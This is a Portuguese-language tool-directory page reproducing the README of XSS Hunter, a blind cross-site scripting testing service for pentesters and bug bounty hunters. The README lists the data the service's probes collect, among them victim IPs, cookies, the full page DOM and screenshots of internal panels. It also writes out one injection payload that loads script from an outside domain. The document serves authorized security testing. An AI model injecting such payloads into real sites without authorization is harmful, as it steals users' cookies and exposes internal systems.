Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
xsshunter — O serviço XSS Hunter - uma versão portátil do XSSHunter.com | Kitploit
Ferramentas/GitHubGitHub/mandatoryprogrammer/xsshunter
Análise de VulnerabilidadesExploraçãoColeta de InformaçõesSegurança WebTestes de Penetração
GitHubmandatoryprogrammer/xsshunter

xsshunter

O serviço XSS Hunter - uma versão portátil do XSSHunter.com

Ver Repositório
1.6k30315há 5 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

OBSOLETO - EXPERIMENTE A NOVA VERSÃO EXPRESS

Veja aqui para mais informações: https://github.com/mandatoryprogrammer/xsshunter-express

Código Fonte do XSS Hunter

Esta é uma versão portátil do código fonte rodando em https://xsshunter.com. É projetada para ser facilmente instalável em qualquer servidor para profissionais de segurança e caçadores de recompensas por bugs que desejam testar XSS de uma maneira muito mais poderosa.

Se você não quiser configurar este software e preferir apenas começar a testar, veja https://xsshunter.com .

Requisitos

  • Um servidor rodando (de preferência) Ubuntu.
  • Uma conta no Mailgun, para enviar e-mails de disparo de payload XSS.
  • Um nome de domínio, de preferência algo curto para manter os tamanhos dos payloads pequenos. Aqui está um bom site para encontrar nomes de domínio de duas letras: https://catechgory.com/. Meu domínio é xss.ht, por exemplo.
  • Um certificado SSL curinga (wildcard), aqui está um barato. Isso é necessário porque o XSS Hunter identifica usuários com base em seus subdomínios e todos eles precisam estar habilitados para SSL. Não podemos usar o Let's Encrypt porque . Vou evitar insultar o modelo de negócios das ACs, mas pode ter certeza de que é muito bobo e custa muito pouco para eles emitirem um certificado curinga para você, então vá com o provedor mais barato que encontrar (desde que seja suportado em todos os navegadores).
eles não suportam certificados curinga

Configuração

Por favor, veja https://thehackerblog.com/xss-hunter-is-now-open-source-heres-how-to-set-it-up/ para informações sobre como configurar o XSS Hunter em seu próprio servidor.

Resumo da Funcionalidade

Ao se inscrever, você criará um domínio curto especial como yoursubdomain.xss.ht que identifica suas vulnerabilidades XSS e hospeda seu payload. Você então usa este subdomínio em seus testes de XSS, usando tentativas de injeção como "><script src=//yoursubdomain.xss.ht></script>. O XSS Hunter servirá automaticamente as sondas XSS e coletará as informações resultantes quando elas dispararem.

Funcionalidades

  • Disparos de payload XSS gerenciados: Gerencie todos os seus payloads XSS no painel de controle da sua conta XSS Hunter.
  • Poderosas Sondas XSS: As seguintes informações são coletadas toda vez que uma sonda dispara em uma página vulnerável:
    • O URI da página vulnerável
    • Origem da Execução
    • O Endereço IP da Vítima
    • O Referenciador da Página
    • O User Agent da Vítima
    • Todos os Cookies Não Apenas-HTTP
    • O DOM HTML Completo da Página
    • Captura de Tela Completa da Página Afetada
    • Requisição HTTP Responsável (Se uma ferramenta compatível com XSS Hunter for usada)
  • Capturas de Tela de Página Completa: As sondas XSS Hunter utilizam a API canvas do HTML5 para gerar uma captura de tela completa da página vulnerável na qual um payload XSS disparou. Com este recurso, você pode espiar painéis administrativos internos, help desks, sistemas de log e outros aplicativos web internos. Isso permite relatórios mais poderosos que mostram o impacto total da vulnerabilidade para seu cliente ou programa de recompensas por bugs.
  • Geração de Relatório em Markup: Cada relatório de payload XSS vem com um relatório markdown pré-gerado. Esses relatórios gerados também são compatíveis com outras plataformas que suportam markdown, como o Phabricator, para facilitar a notificação de bugs nos sistemas de tickets da empresa.
  • Relatórios por E-mail de Disparo de Payload XSS: Os disparos de payload XSS também enviam relatórios detalhados por e-mail que podem ser facilmente encaminhados para os contatos de segurança apropriados para fácil notificação de bugs críticos.
  • Geração Automática de Payloads: O XSS Hunter gera automaticamente payloads XSS para você usar em seus testes de segurança de aplicações web.
  • Injeções Correlacionadas: Talvez a funcionalidade mais poderosa do XSS Hunter seja a capacidade de correlacionar tentativas de injeção com disparos de payload XSS. Ao usar uma ferramenta de teste compatível com XSS Hunter, você pode saber imediatamente o que causou o disparo de um payload específico (mesmo semanas após a tentativa de injeção!).
  • Opção de Criptografia PGP para E-mails de Payload: Extra paranóico? A criptografia PGP do lado do cliente está disponível, que criptografará todos os dados de injeção no navegador da vítima antes de enviá-los ao serviço XSS Hunter.
  • Captura de Páginas: Ao disparar seu payload XSS, você pode especificar uma lista de caminhos relativos para o payload recuperar e armazenar automaticamente. Isso é útil para encontrar outras vulnerabilidades, como políticas crossdomain.xml inadequadas em sistemas internos que normalmente não poderiam ser acessados.
  • Carregamento de Payload Secundário: Tem um payload secundário que você deseja carregar depois que o XSS Hunter fizer o seu trabalho? O XSS Hunter oferece a opção de especificar um payload JavaScript secundário para executar após concluir sua coleta.
  • Aplicativo Web iOS: Também é possível visualizar seus disparos de payload XSS através de um aplicativo web iOS. Basta navegar para o caminho /app e salvar a página como um aplicativo web na área de trabalho do seu iPhone.

Exploits Notáveis

  • XSS cego na ferramenta de serviço interna da Tesla: https://samcurry.net/cracking-my-windshield-and-earning-10000-on-the-tesla-bug-bounty-program/
  • XSS cego na integração Salesforce do Spotify: https://mhmdiaa.github.io/blind-xss-in-spotify/
  • XSS cego no painel de suporte da GoDaddy: https://thehackerblog.com/poisoning-the-well-compromising-godaddy-customer-support-with-blind-xss/

Quer Contribuir?

Todo o código foi criado por mim e (por esse motivo) provavelmente não é a melhor prática e definitivamente precisa de otimização/limpeza. Quaisquer pull requests são apreciados!

Baixar ferramenta